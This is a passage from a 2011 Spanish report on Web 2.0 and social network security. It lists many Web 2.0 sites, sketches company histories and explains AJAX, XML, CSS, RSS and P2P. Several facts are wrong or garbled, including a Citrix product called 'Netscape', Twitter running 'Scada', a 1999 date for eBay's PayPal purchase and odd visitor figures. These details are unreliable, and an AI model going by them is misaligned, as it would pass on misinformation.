¡Cómpralo ya! y Anuncio clasificado. Es otro pionero junto a
Amazon y actualmente pertenece a PayPal. Al contrario
que Amazon si ofrece su servicio en España.
PayPal
PayPal.com PayPal es un servicio de pago a través de Internet. Permite
la transferencia de dinero entre diferentes usuarios de
manera anónima. Los usuarios están menos protegidos
legalmente que si se hace el pago a través de una entidad
financiera como un banco.
Craigslist
Craigslist.org Craigslist es una red centralizada de comunidades urbanas
online. Se trata de un portal web básico que ofrece anuncios
clasificados gratuitos y categoría de curriculum vitae y foros.
Google AdWords
Adwords.Google.com
Google AdWords se trata de un servicio de Google para
incluir publicidad en Google y en su red publicitaria y poder
así captar clientes. El usuario crea sus propios anuncios a su
gusto y eligiendo las palabras clave que desee.
Página 48
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Woot!
Woot.com Woot! se trata de un minorista por Internet Americano.
Woot ofrece un producto al día hasta terminar stock. Tiene
ofertas especiales como Woot-Off, Happy Hour, Bag of
Crap, 2-for-Tuesday y Product launches. Colabora con
Yahoo! Shooping.
Yahoo! Shopping
Shopping.Yahoo.com
Etsy
Etsy.com
Etsy se trata de una web de comercio electrónico
especializada en artículos hechos a mano o artículo vintage.
Estos artículos son de muchos tipos como fotografía, ropa,
joyería, comestibles, productos de baño&belleza, juguetes,
etc.
Página 49
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Páginas Amarillas
PaginasAmarillas.es
Atrapalo
Atrapalo.com Atrapalo es una web de compra de entradas de eventos de
teatro, cine, etc. y la compra de vuelos, hoteles, viajes,
restaurantes, etc. Es muy dinámica porque permite que los
usuarios puntúen las ofertas y opinen.
Kayak
Kayak.com
Kayak permite la compra y el alquiler de coches, hoteles,
vuelos. Permite a los usuarios puntuar las ofertas.
Booking
Booking.com
Booking es una web reserva de hoteles por todo el mundo a
precio muy económico. Permite comentarios de los
usuarios y puntuaciones.
Página 50
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.1.6. Profesionales&Productividad
Webs 2.0 profesionales para perfil de CV y buscar trabajo y webs 2.0 profesionales.
Red Descripción
LinkedIn LinkedIn es una red social orientada a las relaciones
www.linkedin.com laborales. En el portal podemos crear una red de contactos
laborales de confianza que nos puede ayudar a
beneficiarnos en nuestra carrera laboral. También sirve a
modo de CV para poder presentar a las empresas o a los
contactos laborales.
Xing
www.xing.com
Xing es una plataforma de networking online que permite
gestionar contactos laborales y establecer relaciones
profesionales de cualquier empresa y sector. Se fundó en
Alemania con el nombre de openBC. Tiene 10 millones de
usuarios.
Viadeo
www.viadeo.com
Viadeo es una web 2.0 de relaciones profesionales con 30
millones de miembros. Viadeo permite añadirse a la lista de
miembros de socios de negocios manteniéndose en
contacto o ayudarse unos a otros para encontrar trabajo o
encontrar oportunidades de negocio.
FirstDialog
www.FirstDialog.com
FirstDialog aparece en su versión alpha con la misión de
crear una red social de profesionales parecida a las famosas
LinkedIn o Xing.
Página 51
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
FreeWebs
Webs.com FreeWebs es una herramienta online gratuita para creación
de páginas web. Es un portal fácil de usar similar a otros
editores WYSIWYG. Integra muy bien otros sitios de redes
sociales como blogs, Youtube, Photobucket, foros, libros,
revistas, libro de visitas, sistema de votaciones, chat,
juegos, localización de Google Maps, etc.
Página 52
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Mint
Mint.com
Yahoo! Calendar
Calendar.Yahoo.com Yahoo! Calendar es similar a Google Calendar. Se trata de
un calendario vía web, permite añadir eventos con alarmas
de aviso, permite compartir esos eventos con usuarios de
Yahoo! y permite agregarnos a otros calendarios de interés.
Zoho
Zoho.com Zoho se compone de un conjunto de aplicaciones web
como Zoho writer, Zoho Sheet, Zoho Show, Zoho Wiki,
Zoho Notebook, Zoho Meeting, Zoho Projects, Zoho CRM,
Zoho Planner, Zoho Chat, Zoho Mail, etc. La herramienta
fue desarrollada por la compañía americana AdventNet.
Página 53
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.1.7. Música&Sonido
Redes sociales dedicadas a la música.
Red Descripción
Spotify
Spotify.com
Spotify es una aplicación que permite la reproducción de
música vía streaming o guardar la música en local. La
ventaja frente a otras es que se puede realizar una
búsqueda por artista, disco, canción o discografía y
escuchar las canciones de manera íntegra y gratuita.
También puedes añadir a tus amigos a través de Facebook y
escuchar sus listas de reproducción y favoritos. La empresa
fue creada en Suecia.
BlogTalkRadio
BlogTalkRadio.com BlogTalkRadio se trata de una radio online social. Se pueden
escuchar una gran variedad de shows de manera gratuita de
cualquier tipo como coches, financias, negocios, salud,
tecnología, deportes, etc.
Página 54
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
eMusic
eMusic.com
Finetune
Finetune.com
Finetune es una web online de música que te permite
descubrir nueva música, crear playlists y organizar nuestros
artistas favoritos y álbumes.
iLike
iLike.com iLike es un servicio de música social integrado para Google
y Facebook. Permite compartir recomendaciones de
música, listas de reproducción y personalizar alertas. Se
puede integrar con iTunes mediante una barra ubicada a la
derecha.
iTunes
Apple.com/iTunes
Live365com
Live365.com
Página 55
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Pandora
Pandora.com
Microsoft’s Zune
Marketplace
Zune.net Zune es un reproductor digital de audio desarrollado por
Microsoft. Zune no solo se refiere al reproductor sino
también al contenido de Zune Marketplace que funciona
muy parecido a ITunes e ITunes Store.
Grooveshark
Listen.Grooveshark.com
Jamendo
Jamendo.com Jamendo es una comunidad creada para la música libre y
legal, donde los artistas pueden subir música gratuitamente
y su público puede descargarla también de manera gratuita.
JamLegend
Jamlegend.com
JamLegend es un navegador basado en un juego de música
y video gratuito y online, parecido al Guitar Hero. El
componente social es que los jugadores pueden subir
cualquier canción .mp3 vía FTP y compartirlas con otros.
Página 56
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
NexusRadio
Nexusradio.com NexusRadio es un programa muy completo para escuchar
radios de manera online. Tiene una lista de géneros muy
grande.
Página 57
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.1.8. Comunidad
Comunidades de blogueros y noticias.
Red Descripción
WordPress
WordPress.com
WordPress es un gestor de contenidos de blogs de código
abierto. Existe una comunidad muy grande de
desarrolladores y diseñadores que ayudado mucho a su
éxito desarrollando plugins para el gestor. Su facilidad de
uso, las características como gestor de contenidos y el
hecho de que sea opensource han ayudado mucho también.
Worth1000
Worth1000.com Worth1000 es un portal web para manipulación de
imágenes. Posee una gran comunidad así como una gran
selección de fotos. Existen muchos foros de debate que
permiten todo tipo de discusiones.
Bitacoras
Bitacoras.com
Bitacoras se trata de una red social donde los bloggers
pueden crear sus bitácoras y jugar con varios servicios y
herramientas que ofrece el portal. Incorpora un filtro social
que recoge información sobre los blogs y la muestra de
manera organizada y pudiendo ser valorada por los
usuarios.
Alianzo
Alianzo.com
Alianzo es un gestor de contenidos para blogs. Posee un
ranking de usuarios que colaboran en Alianzo de Twitter y
Facebook.
Página 58
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Drupal
Drupal.org
Digg
Digg.com
Meneame
Meneame.net
Yammer
Yammer.com
Yammer es un servicio de microblogging muy parecido a
Twitter, pero enfocado a un sector más empresarial.
Página 59
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.1.9. Búsquedas&Referencias
Portales dedicados a búsquedas, referencias o enciclopedias online.
Red Descripción
Wikipedia
Wikipedia.org
Answers
Answers.com
Google
Google se trata de un motor de búsqueda resultado de la
Google.com
tesis de Larry Page y Sergey Brin para mejorar las
búsquedas en Internet. En cuanto Google se dio a conocer
al mercado, desbancó a todos los buscadores de la época.
Poco a poco la empresa Google Inc. se ha ido expandiendo
y hoy por hoy ofrece una cantidad de servicios inmensa.
Página 60
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Google Earth
Earth.Google.com
Google Earth se trata de un programa informático que
permite visualizar imágenes de la tierra en 3D, así como
imágenes satélite, mapas ayudándose del motor de
búsqueda de Google para encontrar imágenes en el lugar
que deseemos.
Google Maps
Maps.Google.com
Google Maps es un servicio web gratuito que ofrece mapas
web desplazables de todo el mundo. También permite la
posibilidad de ver imágenes de satélites. A través de Google
Maps podemos ver la herramienta Google Street View para
ver fotografías esféricas a pie de calle.
Hakia
Hakia.com
Hakia es un motor de búsqueda. Cuando se creó por
QDEXing se buscaba una alternativa nueva a la estructura
de indexación usando el algoritmo SemanticRank.
Wikia
Wikia.com Wikia se trata de un portal web que da un servicio de
alojamiento gratuito de páginas web. Basado en tecnología
wiki y en la filosofía de cooperación. Fue fundada por
Jimmy Wales, presidente de la compañía Wikimedia,
organización matriz de Wikipedia.
Página 61
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.1.10. Otras
Otros portales 2.0 que no se han incluido en las clasificaciones anteriormente citadas como
juegos de entretenimiento o educación.
Red Descripción
Classroom 2.0 Red social enfocada a la Web 2.0 y las tecnologías
Classroom20.com colaborativas para la educación. Este sitio invita a aquellos
profesionales de la educación interesados en las nuevas
tecnologías a ser parte de esa comunidad virtual y participar
de un diálogo digital entre pares.
GaiaOnline
Gaiaonline.com
cVidaClub
cVidaClub.com
Cvidaclub es así una red social cuya principal razón de ser es
mejorar la calidad de vida de nuestra sociedad.
BeautifulPeople
www.beautifulpeople.com
La web nos dice: “Las apariencias son importantes para
usted cuando tienes que elegir a una pareja. ¿Quisieras que
te garantizaran que tu cita siempre sea Guapo/Guapa?”.
Página 62
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Los usuarios de Facebook pueden participar en redes sociales como colegio o universidad
dónde estudian, trabajo, situación geográfica, etc.
Facebook fue creada por Mark Elliot Zuckerberg, estudiante de la universidad de Harvard. Es
un programador y un gran empresario de Estados Unidos con tan sólo 25 años de edad.
Facebook le está quitando mercado a MySpace, ya que Facebook es una web dedicada para
todo tipo de usuarios y MySpace está destinada principalmente a grupos de música. En
Facebook los grupos de música tienen la posibilidad de darse a conocer a todos los contactos
de y en MySpace se dan a conocer principalmente a otros grupos de música, de ahí la cuota de
mercado que tiene actualmente Facebook. Podríamos afirmar que MySpace que actualmente
en decadencia.
Página 63
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Podemos ver en el siguiente gráfico8, como en Diciembre del 2008 Facebook obtuvo un total
de 222.ooo visitantes, frente a los 125.000 que obtuvo MySpace, es decir una diferencia de
casi 100.000 visitantes.
Ilustración 4. Numero de visitas a las webs Facebook y MySpace durante el año 2008 por meses.
Hablaremos en muchas ocasiones de esta gran red ya que actualmente es la red social que
más usuarios tiene en el mundo con un total de 500 millones de usuarios y la red social más
popular del planeta.
8
Gráfico obtenido del artículo “Facebook now twice as big as MySpace? Oh boy” de Caroline McCarthy escritora de CNet.
http://news.cnet.com/8301-13577_3-10148855-36.html?tag=mncol;title
Página 64
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 65
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La decadencia de MySpace se hizo latente con la salida de Facebook al mercado pero aún así
seguía manteniendo cierta cuota para aquellos melómanos que desearan seguir escuchando
música vía streaming. Actualmente con el nacimiento de Spotify, prácticamente MySpace no
tiene nada que hacer porque la parte de escuchar música en streaming del grupo que desees
está cubierta en esta aplicación. Si MySpace no pega un giro radical en su línea de negocio
probablemente desaparezca con el paso del tiempo o quede destinada a una pequeña cuota
de mercado mínima.
Página 66
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La Web se creó en noviembre de 2005, siendo sus primeros directivos Chad Hurley y Steve
Chen, antiguos empleados de PayPal y hoy en día en los puestos de director ejecutivo y
director de tecnología. En octubre de 2006, Google.Inc compro Youtube por 1.650 millones de
dólares. Actualmente es la empresa líder de video online, siendo el sitio más visitado para ver
y compartir videos en Internet. La calidad de los videos normalmente es algo baja, son videos
pixelados; Youtube también da la posibilidad de ver estos videos en High Quality (Alta
Calidad) permitiendo a los usuarios con una red con más velocidad visionarlos a mejor calidad
o simplemente esperando a que se carguen.
9
Para más información, leer la noticia del periódico ABC, “YouTube y Viacom: libertad de expresión
frente a 'copyright'” a través de la web http://www.hoytecnologia.com/noticias/YouTube-Viacom:-
libertad-expresion/59947.
Página 67
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
10
Para conocer más se puede visitar un interesante enlace de una conferencia que realizó Zaryn a los nuevos alumnos graduados
de la IE Universidad de Segovia sobre la creación de Tuenti.
http://www.youtube.com/watch?v=NLEZouEe8ZA&feature=PlayList&p=954E245F4A4DF71D&playnext=1&playnext_from=PL&i
ndex=4
Página 68
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Flickr funciona bajo AJAX y canales RSS y Atom. Dispone de un API libre para poder
incorporar Flickr a aplicaciones independientes creadas por desarrolladores independientes.
Página 69
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Es el líder del mercado de subastas por Internet, esto debido en parte a que fue uno de los
pioneros en estas transacciones creándose en 1995 por Pierre Omidyar en California, Estados
Unidos. En el año 1999 eBay compró la empresa PayPal, que es el principal sistema de pago
que se utiliza hoy en día para realizarlas compras y ventas en el portal.
Página 70
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 71
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Se creó en 1994 por Jeff Bezos y se lanzó al mercado en 1995 comenzando con cadabra.com
que era una librería online. Actualmente su sede se encuentra en Seattle, Estados Unidos. Se
lanzó a bolsa en 1997, y hoy por hoy Amazon, es uno de los gigantes del mercado informático
habiendo absorbido numerosas empresas y poniéndose al nivel de Google o Microsoft.
Página 72
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Twitter, al igual que la mayoría de Web 2.0, nació como un proyecto de investigación de la
empresa Obvious, una empresa emprendedora y creativa de San Francisco, EEUU. El primer
prototipo de Twitter se creó en marzo de 2006 y se publicitó en agosto de 2006. El portal
creció de manera muy rápida y se hizo muy popular en muy poco tiempo fundándose en mayo
de 2007 la empresa Twitter.
La tecnología usada por Twitter es “Ruby on Rails” o “RoR o Rails”, que se trata de un conjunto
de aplicaciones programadas en Ruby siguiendo el paradigma de la arquitectura MVC (Modelo
Vista Controlador). Los mensajes de Twitter se encuentran en un servidor con software Scada
y la empresa dispone de una API (Interfaz de programación de aplicaciones) de software libre
para poder incorporar Twitter en cualquier aplicación a web que se desee.
11
Para más información sobre ¿qué es Twitter? podemos consultar este video muy explicativo
http://www.youtube.com/watch?v=_8y79gnc35E
Página 73
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Pero Google.Inc comprende muchas aplicaciones basadas en la filosofía 2.0 como GoogleDocs
& Spreadsheets, Google talk, Google Groups, Google Noticias, Google Video, Google
AdSense, Google Adwords, Google Calendar, etc. Hoy en día podríamos meter en esta
clasificación a Youtube ya que pertenece a la empresa.
Página 74
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.2.11. Blogs
Un blog o bitácora, es un portal web que se actualiza prácticamente a diario y proporciona
información sobre un tema determinado. Los artículos son escritos por el autor, y pueden ser
comentados por cualquier usuario de Internet que lo desee y si el webmaster del portal lo
permite.
Los blogs son hoy un día uno de los servicios más populares que existen en la red, de tal
manera que mucha gente tiene blogs personales o incluso los famosos y las empresas utilizan
los blogs para promocionarse de manera activa.
Página 75
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El fenómeno blog, es un claro ejemplo del gran impacto que tienen las redes sociales. Todavía
se discute hoy si existe una “cultura blog”.
Löic Le Meur, un conocido blogger francés, nos muestra tal cultura en la siguiente tabla12.
12
Extractos de las observaciones publicada en Le Meur en 2005 extraídos por Fumero&Sáez Vacas en 2006.
Página 76
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 5
¿Dónde se alojan?
5.1. Servidores, plataformas y máquinas
Una de las características esenciales de la Web 2.0 es la interfaz, ya que es lo que el usuario
finalmente ve, pero detrás de esta interfaz hay toda una tecnología. Hay otros aspectos
esenciales de estas webs que son la funcionalidad y la velocidad de respuesta, que en muchos
casos son deficientes cuando se trata de los recursos del servidor a la hora de cubrir demandas
de aplicaciones interactivas. Para que este tipo de aplicaciones se necesite una comunicación
entre el servidor y el cliente uno a uno, lo que requiere gran capacidad de recursos de los
servidores disminuyendo rendimiento y escalabilidad. Muchas webs, debido a la gran
demanda de datos que se realiza a los servicios ofertados por ellas, se ven obligadas a
comprar grupos muy grandes de servidores para soportar esta demanda de datos.
En el año 2009, la empresa Citrix Systems Inc., sacó al mercado la primera tecnología push
Web 2.0. La tecnología llamada Netscape, permite de entrega de aplicaciones que permite
simplificar el proceso de disminución de envío de información, enviando datos desde al
servidor a miles de usuarios a la vez. Gracias a esta nueva tecnología Netscape permite liberar
a los servidores del back-end de las tareas de administración de conexiones ineficientes,
reduciendo el número de servidores necesarios para esto lo que permite ahorrar costes y
mayor eficiencia.
Por detrás de la interfaz de los portales 2.0 existen los sistemas de gestión de contenido o
CMS (del inglés Content Management Systems); se trata de la base de las plataformas de
servicios de publicación y colaboración apoyadas en blogs y wikis; sistemas técnicos
complejos. El gran éxito que tienen es la facilidad de implantación y uso que tienen.
Página 77
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Debido a esto las empresas tecnológicas crean servidores especializados para este tipo de
empresas.
Por ejemplo el servidor iDataPlex de IBM esta especialmente pensado para este tipo de
servicios.
Hay diferentes formas de trabajar con estos servidores de manera que las conexiones entre
cliente y servidor sean más rápidas y eficientes. La más popularizada son las bases de datos
distribuidas; se conectan varios maquinas para poder así procesar las aplicaciones en paralelo
aumentando los tiempos de respuesta para funciones de búsqueda. Se tratan de conjuntos de
bases de datos que se relacionan datos de manera lógica encontrándose físicamente
distribuidas en diferentes sitios, pero trabajando a nivel lógico de manera conjunta.
IBM está colaborando en una iniciativa para el desarrollo de futuras tecnologías, con dos
instituciones académicas importantes que son Georgia Institute of Technology y Ohio State
University, para realizar una investigación de centros de computación basados en cloud
computing14. El proyecto incluye la creación de una “nube de computación” uniendo los
centros de cómputo de las dos instituciones. Estos centros dan la opción a las empresas de
hacer más con menos recursos ya que habilitan la gestión de las aplicaciones como un tejido
de recursos distribuido al cual se tiene acceso global en vez de depender sólo de máquinas
locales lo que aumentará el rendimiento de las máquinas y disminuirá la complejidad y los
recursos para administrar recursos de la computación distribuida.
13
[8] (Fuente http://www.codejava.org/v2_vernota.htm?idxnota=72643&destacada=1)
14
El cloud computing se trata de un paradigma que permite ofrecer servicios de computación a través de Internet. En este tipo de
computación todo lo que puede ofrecer un sistema informático se ofrece como un servicio de modo que los usuarios accedan a
ese servicio disponible en la “nube de internet” o “cloud computing” sin necesidad de tener conocimientos en los sistemas que
usan. Para saber más en la web de Wikipedia, http://es.wikipedia.org/wiki/Computaci%C3%B3n_en_nube.
Página 78
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 6
¿En qué entornos se usan?
La Web 2.0 está en todo tipo de entornos, pudiendo clasificar estos de manera cultural,
laboral y social.
6.1. Social
Las redes sociales hoy en día en auge en el mundo de Internet son aquellos portales dedicados
a establecer vínculos sociales con otras personas compartiendo fotos, videos, imágenes,
blogs… entre usuarios que se registran un sitio web y establecen vínculos familiares,
amistosos, laborales, amorosos, económicos, etc. Estas webs proporcionan herramientas para
crear contenidos de manera colaborativa. La gran parte de las herramientas tienen un
componente social, ya que al ser Web 2.0 unen usuarios con intereses comunes.
6.2. Profesional
Las redes profesionales son aquellas redes que circulan vía intranet o extranet para el apoyo
profesional enfocado al trabajo diario, ya son aplicaciones para gestión de incidencias,
seguimiento de proyectos, etc. Las aplicaciones dentro de la empresa cada vez van
adquiriendo un enfoque 2.0 mayor, de manera que todas las aplicaciones nuevas que van
surgiendo en los entornos empresariales van más enfocadas al entorno de la colaboración.
Página 79
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
6.3. Cultural
Se trata de aquellas redes dedicadas compartir cultura, ya sea literatura, arte, libros, cine,
educación, etc. La educación en concreto debería ser un pilar en la construcción de la
“sociedad del conocimiento”, aunque hoy un día existen muchas barreras institucionales para
ello.
Las herramientas más destacadas del entorno cultural son las educativas, un ejemplo de ellas
es eLearning 2.0.
15
Artículo “La Web 2.0 y sus aplicaciones didácticas”, http://www.peremarques.net
Página 80
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 7
Cómo se desarrollan: Tecnologías
y lenguajes
7.1. Desarrollo de los lenguajes y tecnologías que giran en torno a la
Web 2.0
En estos últimos años el desarrollo de las nuevas tecnologías se ha incrementado tanto en
número como en complejidad de manera increíble. El desarrollo de la Web 2.0 ha hecho que
surjan con ella un conjunto de nuevas tecnologías mejorando las anteriormente conocidas o
uniendo algunos lenguajes para crear mayor versatilidad en los portales 2.0.
Los lenguajes y tecnologías que van ligados a este desarrollo de la Web 2.0, resaltando en
negrita las más importantes, son:
Página 81
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
De todas estas tecnologías y detrás de todos los grandes portales que engloban la Web 2.0
podemos destacar una tecnología común que es Asynchronous JavaScript And XML (AJAX).
AJAX es un conjunto de técnicas de desarrollo web usadas en el lado del cliente para crear
aplicaciones Web y Rich Internet Applications (RIA). Con AJAX, las aplicaciones Web pueden
recuperar datos del servidor de modo asíncrono sin interferir con la presentación ni con el
comportamiento de la página. El uso de AJAX ha desembocado en un incremento en la
interactividad de las páginas web y una mejor calidad de los servicios Web gracias al modo
asíncrono. Los datos se obtienen del servidor usando el objeto XMLHttpRequest (XHR).
- HyperText Markup Language (HTML) y Cascading Style Sheets (CSS) para el marcado y
presentación de la información.
- Document Object Model (DOM) accedido mediante JavaScript para mostrar
dinámicamente y permitir la interacción con la información mostrada.
- Un método para intercambiar información de modo asíncrono entre el navegador y el
servidor, evitando las recargas de la página. El objeto XMLHttpRequest es el más
usado, pero en ocasiones se usa un objeto IFrame o una etiqueta <script>.
- Un formato para los datos, los más comunes son Extensible Markup Language (XML),
HTML preformateado, texto plano, y JavaScript Object Notation (JSON), estos datos
pueden ser generados dinámicamente por alguna forma de Server-side Scripting.
Hay que remarcar, de todos modos que JavaScript no es el único lenguaje que puede usarse
como lenguaje de script en el lado cliente, por ejemplo, Visual Basic Scripting Edition
(VBScript) también es un ejemplo de ello. Además XML no es obligatorio para el intercambio
de información, JSON se usa a menudo como una alternativa y otros formatos también
pueden usarse, como ya se ha comentado.
En muchos casos, al navegar entre páginas de un mismo website hay mucho contenido común
entre ellas, usando los métodos tradicionales, ese contenido sería recargado con cada
petición, sin embargo, al usar AJAX, una aplicación Web puede pedir únicamente el contenido
que necesita cambiar, reduciendo drásticamente el tiempo de carga y el ancho de banda
utilizado.
La utilización de peticiones asíncronas permite al navegador del cliente ser más interactivo y
responder más rápidamente, los usuarios perciben que la aplicación es más rápida y que
reacciona con más rapidez, aun cuando la aplicación no ha cambiado en el lado del servidor.
Página 82
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El uso de AJAX reduce las conexiones al servidor, dado que los scripts y hojas de estilo solo
tienen que ser pedidas una vez.
Los estados perduran durante toda la visita a un website, las variables JavaScript persisten
dado que el contenido principal de la página no tiene que ser recargado. Sin embargo también
existen argumentos en contra de su uso, tales como:
Dado que la mayoría de Web Crawlers16 no ejecutan JavaScript, las Aplicaciones Web que
deben ser indexadas públicamente deben proporcionar maneras alternativas de acceder a su
contenido, para permitir a los motores de búsqueda indexarlas.
La “same origin policy” impide que algunas técnicas de AJAX puedan ser usadas entre
dominios, aunque el W3C tiene un borrador que habilitará esta funcionalidad.
AJAX abre vías a nuevos vectores de código malintencionado que los desarrolladores web no
conocen aun suficientemente.
Hemos de destacar un par de neologismos que son los microformatos y las folksonomías17.
Los microformatos son procedimientos y formatos estandarizados creados por los propios
consumidores, usuarios, internautas de la web, destacando la asignación de etiquetas del
contenido de la web de manera fácil. En definitiva han desarrollado el etiquetado semántico;
se trata de navegar a través de etiquetas, sin tener una autoridad centralizada. El etiquetado
semántico ha cambiado la forma de generar y consumir información en la Web. La tecnología
16 Web Crawler o Araña Web , se trata de un programa que inspecciona las páginas del World Wide Web de forma metódica y
automatizada con el fin de crear índice de búsqueda, analizar links rotos de una web o recopilar información sobre una web de
cierto tipo. Para ver más en Wikipedia, http://en.wikipedia.org/wiki/Web_crawler.
17
La folksonomía es la clasificación por medio de tags o etiquetas en nombre simples y sin jerarquías ni relaciones. Sitios
destacados de tags pueden ser Delicios o Flickr.
Página 83
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
que más se usa en este entorno es XHTML (de las siglas eXtensible Hypertext Markup
Language), es un lenguaje de marcado que se pensó para ser el lenguaje estandarizado de
páginas web, dejando de lado el HTML, intentando conseguir una web semántica.
El XML, lenguaje de marcas extensible (de las siglas Extensible Markup Language) es una
evolución del HTML (HyperText Markup Language o en español “Lenguaje de Marcas de
Hipertexto”). El HTML se basa en etiquetas que están predefinidas por el lenguaje para la
creación de páginas webs. El XML es un metalenguaje de etiquetas que llega más allá y
permite crear etiquetas “propias”, es decir, donde en HTML existe una etiqueta que puede ser
<head> en XML esta misma etiqueta podría ser <mycabecera>. HTML ha evolucionado en
muchas otras tecnologías junto a XML como son, CSS (de las siglas Cascading Style Sheets), se
trata de un lenguaje avanzado que sirve para expresar hojas de estilo. XHTML, XSLT (de las
siglas eXtensible Stylesheet Language Transformations), que se trata de un lenguaje de
transformación usado cambiar, añadir o eliminar etiquetas y atributos. DOM (de las siglas
Document Object Model) es un conjunto de llamadas a funciones para manipulación de
archivos XML y HTML de manera estandarizada. OPML (de las siglas Outline Processor Markup
Language) se trata de una lista en formato XML orientado para esquemas (del inglés outlines);
principalmente se usa para listar fuentes RSS (Really Simple Syndication) juntas.18
CSS o hojas de estilo en cascada es un lenguaje de hojas de estilo usado para describir la
presentación (esto es, la apariencia y formato) de un documento escrito en un lenguaje de
marcado. Su aplicación más usual es definir la presentación de páginas web escritas en HTML
y XHTML, pero puede ser aplicado a cualquier tipo de documento XML.
CSS está diseñado principalmente para permitir la separación del contenido del documento,
de su presentación, esta separación puede mejorar la accesibilidad del contenido, la
flexibilidad y control en la especificación de las características de presentación, permitiendo
que múltiples páginas compartan formato, y reduciendo la complejidad y repetición en el
contenido estructural (como por ejemplo permitiendo el diseño web sin tablas). CSS además
permite a la misma página ser presentada en diferentes estilos para diferentes métodos de
rendering, también puede ser sustituida la que el autor especifico por una de la propia
computadora.
CSS define un esquema de prioridades que determina que regla aplica en caso de que mas de
alguna pueda usarse en un elemento en particular, en esta llamada cascada, las prioridades se
calculan según están asignadas a las reglas, así que los resultados son predecibles. Las
especificaciones CSS las mantiene el World Wide Web Consortium (W3C).
Really Simple Syndication (RSS 2.0), es un formato de documento que se trata de la unión de
varios formatos de fuentes web codificados en XML conforme indicaciones del W3C, para la
18
. Para más información se puede visitar la página de W3C, www.w3c.es
Página 84
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La idea es facilitar la inserción de contenidos en las páginas web que actualizan información
constantemente para hacerlo de manera más dinámica. Los documentos (“RSS feeds”) se leen
por los lectores (RSS readers) que se llaman agregadores (del inglés aggregators).RSS permite
modificar la información del portal sin necesidad de tener un navegador, permite que en el
escritorio de la propia máquina se tenga actualizada la información.
El tipo de webs que más utilizan este formato son webs de periódicos (The New York Times, El
País, ABC, El Mundo…), de televisiones (BBC, Telecinco, La Sexta…), revistas (Rolling
Stone…), blogs, portales del tipo Yahoo, Msn, etc.
Junto a RSS existen más estándares para la sindicación de contenidos, otro muy usando es el
formato ATOM también es otro tipo de formato web.
Otra tecnología orientada a la Web 2.0 es la tecnología Peer to peer (su traducción
corresponde a “redes de pares” o “redes entre iguales”) o P2P. Las redes P2P son muy útiles a
la hora de compartir archivos entre máquinas. Las redes P2P son una red de máquinas, donde
no existen servidores fijos, sino que las propias máquinas hacen la función de servidores al
resto de las máquinas de la misma red de manera que optimizan el ancho de banda agilizando
la transferencia de archivos y consiguiendo una velocidad de transferencia mayor.
Existen aplicaciones P2P muy conocidas por todos como son Emule (en recisión hoy en día
debido al uso de archivos torrent), eDonkey (cerrado debido a un juicio que tenía la Recording
Industry Association Of América (RIAA) a la empresa que llevaba esta aplicación MetaMachine
en septiembre del 2006), BitTorrent (muy usado hoy en día), Skype (para comunicaciones
voIP), etc.
El que este tipo de redes perdure y se usen con mucha frecuencia se debe a que son redes muy
robustas, llegan a todo el mundo con capacidad para millones de usuarios, se trata de redes
descentralizadas, los costes se reparten entre usuarios que son mayoritariamente anónimos y
unas de las principales cosas q ha impulsado su desarrollo ha sido el gran ancho de banda que
existe a nivel mundial.
No todos son ventajas en las redes P2P, una desventaja y muy grande es el problema de la
seguridad; debido a que muchos de los archivos que se comparten a nivel mundial se hacen de
manera “ilegal” ya que conllevan muchos problemas de derechos de autor, las autoridades de
los grandes países, principalmente EEUU, se dedican a inyectar archivos corruptos o erróneos
en estas redes para que finalmente terminen extinguiéndose este tipo de aplicaciones debido
a la poca fiabilidad de los archivos, como ocurrió con la aplicación Kazaa. Este tipo de archivos
Página 85
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
se puede tratar de virus, gusanos o troyanos, programas de spyware, malware, etc.; las redes
P2P son una de las principales fuentes de intercambio de este tipo de archivos maliciosos.
Existen librerías y herramientas que permiten facilitar la tarea de incorporar aplicaciones a las
webs ya que ésta no suele ser fácil porque los navegadores son diferentes a la hora de
interpretar código y porque mantener gran cantidad de código en JavaScript y componentes
basados en AJAX no es una tarea fácil.
DWR (Direct Web Remoting) se trata de una librería de JavaScript que hace el uso de AJAX
más simple. DWR permite publicar fácilmente funcionalidades de clases Java para accederlas
vía JavaScript, es decir, permite a JavaScript interactuar con las clases de Java en un server
ayudando así a la mejora de resultados en las páginas webs.
Si lo que se desee es apoyar la parte gráfica para obtener una mejora de la interfaz se podría
